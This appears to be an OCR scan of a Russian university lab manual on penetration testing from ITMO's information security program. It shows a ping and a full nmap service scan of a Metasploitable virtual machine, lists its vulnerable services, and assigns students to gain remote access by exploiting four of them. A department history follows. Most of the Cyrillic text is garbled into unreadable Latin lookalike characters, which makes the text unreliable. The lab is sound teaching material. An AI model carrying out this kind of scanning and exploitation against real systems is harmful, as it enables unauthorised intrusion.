root{§bad: # ping 10.211.55.8 

PING 10.211.55.8 (10.211.55.8) 56(84) bytes of data. 

64 bytes from 10.211.55.8: icmp_seq=l ttl=64 tirne=0.378 ms 

64 bytes from 10.211.55.8: icmp_seq=2 ttl=64 time=0.636 ms 

64 bytes from 10.211.55.8: icmp_seq=3 ttl=64 time=0.594 ms 

A C 

— 10.211.55.8 ping statistics — 

3 packets transmitted, 3 received, 0% packet loss, time 2032ms 
rtt min/avg/max/mdev = 0.378/0.536/0.636/0,113 ms 

root@bad: # 


PncyHOK 21 - IlpOBepKa coe^HHeHna MOKfly BHpTyajiBHBiMH MauiHHaMH 

9) Hna onpefleJieHHa 3anymeHHBix Ha HCCue^yeMOH ManiHHe ceTeBbix 
cepBHCOB c ManiHHbi «aTaKyK)mero» Heo6xoflHMO npoH3BecTH CKaHHpoBaHHe 
npn noMOHi,H yTHjiHTbi nmap (pncyHOK 22). 

root@bad: ~ O 0 O 


File Edit View Search Terminal Help 
root@bad : # nmap -sV 10.211.55.8 -pl-65535 


Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-02 09:28 MSK 
Stats: 0:02:16 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan 
SYN Stealth Scan Timing: About 19.25% done; ETC: 09:39 (0:09:31 remaining) 
Stats: 0:03:56 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan 
SYN Stealth Scan Timing: About 20.72% done; ETC: 09:47 (0:15:03 remaining) 

Nmap scan report for 10.211.55.8 
Host is up (0.00059s latency). 

Not shown: 65505 closed ports 


PORT 

STATE 

SERVICE 

VERSION 

21/tcp 

open 

ftp 

vsftpd 2.3.4 

22/tcp 

open 

ssh 

OpenSSH 4.7pl Debian 8ubuntul (protocol 2.0) 

23/tcp 

open 

telnet 

Linux telnetd 

25/tcp 

open 

smtp 

Postfix smtpd 

53/tcp 

open 

domain 

ISC BIND 9.4.2 

80/tcp 

open 

http 

Apache httpd 2.2.8 ((Ubuntu) DAV/2) 

111/tcp 

open 

rpcbind 

2 (RPC #100000) 

139/tcp 

open 

netbios-ssn 

Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 

445/tcp 

open 

netbios-ssn 

Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 

512/tcp 

open 

exec? 


513/tcp 

open 

login 


514/tcp 

open 

tcpwrapped 


1099/tcp 

open 

rmiregistry 

GNU Classpath grmiregistry 

1524/tcp 

open 

shell 

Metasploitable root shell 

2049/tcp 

open 

nfs 

2-4 (RPC #100003) 

2121/tcp 

open 

ftp 

ProFTPD 1.3.1 

3306/tcp 

open 

mysql 

MySQL 5.0.51a-3ubuntu5 

3632/tcp 

open 

distccd 

distccd vl ((GNU) 4.2.4 (Ubuntu 4.2.4-lubuntu4)) 

5432/tcp 

open 

postgresql 

PostgreSQL DB 8.3.0 - 8.3.7 

5900/tcp 

open 

vnc 

VNC (protocol 3.3) 

6000/tcp 

open 

Xll 

(access denied) 

6667/tcp 

open 

ire 

UnrealIRCd 

6697/tcp 

open 

ire 

UnrealIRCd 

8009/tcp 

open 

ajpl3 

Apache Jserv (Protocol vl.3) 

8180/tcp 

open 

http 

Apache Tomcat/Coyote JSP engine 1.1 

8787/tcp 

open 

drb 

Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb) 

40334/tcp 

open 

status 

1 (RPC #100024) 

47332/tcp open 

nlockmgr 

1-4 (RPC #100021) 

47923/tcp open 

rmiregistry GNU Classpath grmiregistry 

51020/tcp 

open 

mountd 

1-3 (RPC #100005) 


MAC Address: 08:00:27:40:65:26 (Oracle VirtualBox virtual NIC) 

Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: 


cpe:/o:linux:linuxke rnel 


PncyHOK 22 - Pe3yjibTaT CKaHHpOBaHHa HCCJie^yeMOH ManiHHbi 

IlojiyHeHHbiH cnncoK cepBHCOB Hcnojib3yeTca flajibHenuieH 

3KcnjiyaTau;HH. 


3afl,aHHe Ha aaSopaTopHyio pa6oTy: 

1. HacTpOHTb HH(f)pacTpyKTypy jxjik BbinojiHeHHa jia6opaTOpHOH pa6oTbi. 

2. Onpe^eJinTb flocTynHbie cepBHCbi Ha HCCJieflyeMOH MauiHHe. 


35 




3. IlojiyHHTb y^ajieHHbiii .zjocTyn, nyreM 3KcnjiyaTaii,HH ya3BHMOCTefi 
HCTbipeX pa3JIHHHbIX CepBHCOB. 

4. 0(])opMHTb othct no jia6opaTopHOH pa6oTe. 
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3AKJIIOHEHHE 


,Z],aHHoe yHeSHO-MeTO^HHecKoe nocoSne npH 3 BaHO noMOHb CTy^eHTaM, 
H3yHaK)iu,HM b paMKax CBoefi o6pa30BaTeabHOH nporpaMMbi AncuHnjiHHy 
«TeXHOJIOrHa CepTH(f)HKaH,HH Cpe^CTB 3amHTbI HH(f)OpMaLI,HH», 3(J)4)eKTHBHee 
ocBOHTb H3ynaeMbra MaTepnan - noHJiTb ochobbi 3KcnjiyaTau;HH ya3BHMOCTeS h 
0C03HaTb Ba>KHOCTb H Heo6xOflHMOCTb CepTH^HKapHH. 

JlaSopaTopHbie pa6oTbi, BKJiiOHeHHbie b cocTaB .zjaHHoro yneSHO- 
MeTO^HHecKoro nocoSna, npH3BaHbi noMOHb noHHTb, xax Ha npaKTHKe 
npoHexoflHT npopecc c6opa HH(J)opMau;HH, npopecc nojiyneHHH HHC^opMaijHH ot 
ceTeBbix cepBHCOB (cKaHHpOBaHira cera), npoueAypa noncKa h SKcnjiyaTaijHH 
ya3BHMOCTeii b paMKax npoBe^eHHa TecmpoBaHHJi Ha npOHHKHOBeHHe. 
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H.3. EayMaHa. Cepna: IIpnSopocTpoeHHe. 2011. N 2 SPEC. C. 7-19. 
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yHMBEPCMTET MTMO 


Mhcchh yHHBepcHTeTa - reHepanna nepe^OBbix 3HaHnn, BHe^peHne 
HHHOBaU,HOHHBIX pa3pa60T0K H nOflTOTOBKa 3JIHTHBIX KaflpOB, cnoco6Hbix 
aeHCTBOBaTb b ycaoBHax 6biCTpo Meronomeroca MHpa n oOecnennBaTb 
onepe^aiomee pa3BHTne Hayxn, TexHOJiornn n /jpyrnx oOnacTen 
co^eHCTBHa pemeHHK) aKTyaubHbix 3a^,an. 


HAnPABJIEHME nOfll"OTOBKM (CnEUMAJlbHOCTM) 
10.03.01 «MH(DOPMAL4MOHHAE BE30nACH0CTb» 

HanpaBjieHHe no^roTOBKH (cnen,najibHOCTn) 10.03.01 «PlHcJ)opManMOHHafl 
6 e 3 onacHOCTb» peajin3yeTca xax npo(J)eccHOHajibHaa o6pa30BaTejibHaa 
nporpaMMa Bbicmero o 6 pa 30 BaHHa OaKajiaBpnaTa b YHHBepCHTeTe HTMO. 
Ka(J)e^pa npoeicmpOBaHHa h 6e3onacHOCTH KOMnbiOTepHbix chctcm 
ocymecTBJBiJia no^roTOBKy OaKajiaBpOB b oOjiacTH HHcfjopMapnoHHOH 
6e3onacHOCTH KOMnbiOTepHbix chctcm no .zjaHHOMy HanpaBJieHmo no^roTOBKH. 

MCTOPME PEAJ1M3AUMM HAnPABJIEHME 

1945-1966 PJIIiy (Kac|)eApa pa/iHoaoKanHOHHbix npnOopOB n ycTponcTB). 
PemeHneM CoBeTCKoro npaBHTejibCTBa b aBrycTe 1945 r. b JIHTMO 6biji OTKpbiT 
cl)aKyjibTeT 3JieKTponpn6opocTpoeHna. IlpHKa30M no HHCTHTyry ot 17 ceHTaOpa 
1945 r. Ha stom c])aKyjibTeTe 6biJia opraHH30BaHa Kac])e^pa pa^HOJiOKannoHHbix 
npnOopOB n ycTponcTB, KOTopaa CTana roTOBHTb nroKeHepoB, 
cnen,najiH3npyK)ni^Hxca b hobbix HanpaBjieHnax pa^,H03JieKTp0HH0n TexHHKH, 
TaKHx Kax pa^,HOJiOKan,na, pa^noynpaBjieHne, TeneHaBe^eHne n ,gp. 
OpraHH3aTOpOM n nepBbiM 3aBe^,yion],HM Ka^eApon 6bui a.t.h., npo(f)eccop 
C.H. 3njiHTHHKeBHn (j \o 1951 r.). BbinycKHHKaM Ka(J)e^pbi npHCBanBanacb 
KBajin(J)nKau;na HroKeHep-paflHOMexaHHK, a c 1956 r. - pa^nonroKeHep 
(cnepnanbHOCTb 0705). 

B pa3Hbie roflbi Ka^e^pon 3 aBeflOBann ^opeHT B.C. MnmnH, ^opeHT 
H.n. 3axapOB, ^olicht A.H. HBaHOB. 

1966-1970 KhIIP3A (Kac|)e,apa KOHCTpynpoBaHna n nponsBO^CTBa 
paflHoajieKTpoHHon annapaTypbi). Ka^bin yneOHbin njiaH cnen,najibHOCTH 0705 
KopeHHbiM o6pa30M OTjinnajica ot npeflbmymiix nnaHOB pa/jHOTexHHHecKon 
cnennajibHOCTH cBoen hctko Bbipa^ceHHon KOHCTpyKTOpCKO-TexHOJiornHecKOH 
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HanpaBjieHHOCTbio. OKaHHMBaPOiuHM HHCTHTyr no 3 toh cnen,najiBHOCTH 
npncBanBajiacb KBajiH^HKanHJi HH^ceHep-KOHCTpyKTop-TexHOJior P3A. 

3aBe^OBaji Ka(J)e^,pon Aon,eHT A.H. HBaHOB. 

1970-1988 KhII 3BA (Ka<j)eApa KOHCTpynpOBaHHfl n npon3BOACTBa 
3JieKTpoHHon BbiHHCJiHTejiBHon annapaTypbi). BypHoe pa3BHTne 3JieKTpOHHon 
BblHHCJIHTeJIbHOH TeXHHKH H BHeflpeHHe ee BO Bee OTpaCJIH HapOflHOrO X03BHCTBa 
noTpe6oBajin ot OTenecTBeHHon paAnoajieKTpOHHon npOMbinmeHHOCTH pe- 
meHna hobbix OTBeTCTBeHHbix 3aAan. KacJ)eApa CTana roTOBHTb nroxeHepOB no 
cnen,najibHOCTH 0648. IIoAroTOBKa npOBOAHJiacb no AByM HanpaBjieHHBM - 
aBTOMaTH3an,na KOHCTpynpoBaHHB 3BA n TexHOJiorna MHKposjieKTpoHHbix 
ycTponcTB 3BA. 

3aBeAOBann KacJjeApon: a-t.h., npo<j). B.B. Hobhkob (ao 1976 r.), 3aTeM 
npoc|). r.A. IleTyxoB. 

1988-1997 MAII (ica(f)eApa MHKpoajieKTpoHHKH n aBTOMaTH3apHH 
npoeKTHpOBaHna). Ka(J)eApa Bbinycxajia HHXceHepoB-KOHCTpyKTopoB- 
TexHOJioroB no MHKposjieKTpoHHKe n aBTOMaTH3an,nn npoeKTnpoBaHna 
BbinncjiHTejibHbix cpeACTB (cnen,najibHOCTb 2205). BbinycKHHKn stoh Ka^eApti 
HMeiOT xopomyio TexHonornnecKyio noAroTOBKy n ycnenmo pa6oTaiOT icax b 
npOH3BOACTBe nojiynpoBOAHHKOBbix HHTerpajibHbix MHKpocxeM, Tax n npn nx 
npoexTHpOBaHnn, ncnojib3ya coBpeMeHHbie mctoam aBTOMaTH3an;HH 
npoexTHpOBaHna. MH>KeHepbi cnen,najibHOCTH 2205 TpeSyiOTca 
MHKposjieKTpoHHon npOMbinmeHHOCTH h npeAnpMflTHflM-pa3pa6oTHHKaM 
BbinncjiHTejibHbix chctcm. 

Ka(J)eApoH c 1988 r. no 1992 r. pyxoBOAHJi npo(J). C.A. ApycTaMOB, 3aTeM 
CHOBa npoc|). r.A. IleTyxoB. 

C 1996 r. xa^eApon 3aBeAyeT a-t.h., npoc|)eccop K).A. raTHHH. 

1997-2011 IIKC (Ka<j)eApa npoeierapOBaHHa KOMnbiOTepHbix chctcm). 
Ka^eApa BbinycKajia nroxeHepOB no cnepnajibHOCTH 210202 «IIpoeKTHpOBaHHe 
n TexHOJiorna ajieKTpOHHO-BbinncjinTejibHbix cpeACTB». 06jiacTb 
npo(J)eccnoHajibHon AeaTejibHOCTH BbinycKHHKOB BKmonajia b ce6a 
npoeKTHpOBaHne, KOHCTpynpoBaHne n TexHOJiornio aneKTpoHHbix cpeACTB, 
OTBenaioni,Hx n,ejMM nx (J)yHKn,HOHnpoBaHHB, Tpe6oBaHHBM HaAOKHOCTH, 
AH3anHa n ycjiOBHBM 3KcnjiyaTan,nn. KpOMe Toro, Kacl)eApa roTOBHJia 
cneAnajincTOB no 3am;HTe HH^opMapHn, cnepnajibHOCTb 090104 «KoMnjieKCHaa 
3am;HTa oSbcktob HH(j)opMaTH3an:HH». OSbeieraMH npocfjeccnoHajibHon 
AeaTejibHOCTH cnen,najincTa no 3amHTe HHcjjtopivianMH aBjnnoTca mctoabi, 
cpeACTBa n cncTeMbi oSecneneHna 3ain,nTbi HH(J)opMan,HH Ha oOberrax 
HH4)OpMaTH3an,HH. 
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B 2009 h 2010 ro,o,ax Ka(J)efl,pa 3aHJuia BTopoe, a b 2011 ro^y - noneTHoe 
nepBoe MecTO b KOHKypce cpe^H KacJ)eAP yHHBepcnTeTa. 

C 2011 ro,aa IIBKC (Ka(J)eApa npoeKTnpoBaHna n 6e3onacHoem 
KOMntiOTepHBix chctcm). Ka<J)eflpa ocymecTBJixeT nonroTOBKy OaxajiaBpOB n 
MaracTpOB no HanpaBJieHHBM 090900 «HH(j)opMai];HOHHa5i 6e3onacHOCTb» 
(c 2013 r. KOflbi HanpaBJieHna: fljia OaKajiaBpOB 10.03.01, ^jib MarncTpoB 
10.04.01) n 211000 «KoHCTpynpoBaHne n TexHOJiorna 3JieKTpoHHbix cpeACTB» 
(c 2013 r. Ko^bi HanpaBjieHira: ajiji 6aicajiaBpOB 11.03.03, ajui MarncTpoB 
11.04.03), a TaioKe npoflOiracaeT no,o,roTOBKy nroiceHepOB no cnen,najibHOCTBM 
090104 n 210202. 

C 2017 ro/ja icac^e/jpon 3 aBeflOBan k.t.h., flopem: ,ZJ.A. 3aKOJiflaeB. 

3a BpeMB CBoero cymecTBOBaHna Ka^e^pa Bbinycrajia 6onee 4750 
HH^ceHepoB, cnepnanncTOB, OaKanaBpoB n MarncTpoB. Ha Kac^e^pe 3amnii];eHO 
100 KaHnnnaTCKHx n 16 flOKTOpCKnx flnccepTapnn. 

B cbb3h c peopraHH3an,nen CTpyKTypbi Mera(J)aKyjibTeTa KOMnbiOTepHbix 
TexHOJiornn n ynpaBjieHna, (J)aKyjibTeTa 6e3onacHOCTH HH(J)opMan,noHHbix 
TexHOJiornn, o^hhm H3 nofl,pa3flejieHnn KOTopbix aBjuuiacb Ka(f)e,apa nBKC, 
ocymecTBJieHne pyKOBO^CTBa HanpaBJieHneM no^roTOBKH (cnepnajibHOCTn) 
10.03.01 «HH(J)opMau;noHHaB 6e3onacHOCTb» B03Jio>KeHO Ha OT^eji ^npeKpna 
o6pa30BaTejibHbix nporpaMM cj)aKyjibTeTa 6e3onacHOCTH HH(J)opMannoHHbix 
TexHOJiornn». 
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